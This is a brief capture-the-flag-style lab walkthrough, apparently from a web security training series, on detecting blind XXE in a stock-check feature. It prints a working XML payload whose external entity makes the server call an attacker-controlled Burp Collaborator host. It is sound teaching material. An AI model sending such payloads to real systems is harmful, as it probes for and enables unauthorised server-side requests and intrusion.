Blind XXE with out-of-band interaction

Exploitation

the lab has a "check stock" feature that parses XML input

send to repeater

this is a blind XXE

let's open collaborator in burp suite and get a url and try to issue a DNS lookup to this url to make sure that this website is vulnerable to blind XXE

This XXE attack causes the server to make a back-end HTTP request to the specified URL (collaborator URL). The attacker can monitor for the resulting DNS lookup and HTTP request, and thereby detect that the XXE attack was successful.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://tgd18wllnshtjl7z3einaj853w9nxel3.oastify.com"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

so the attack is successfull because the backend server of the website issued a DNS lookup to the attacker server so the website is vulnerable to blind XXE.

hope you found this walkthrough easy to understand and follow

Greeting From Sayonara

PreviousExploiting XXE to perform SSRF attacks NextBlind XXE with out-of-band interaction via XML parameter entities

Last updated 1 year ago

Was this helpful?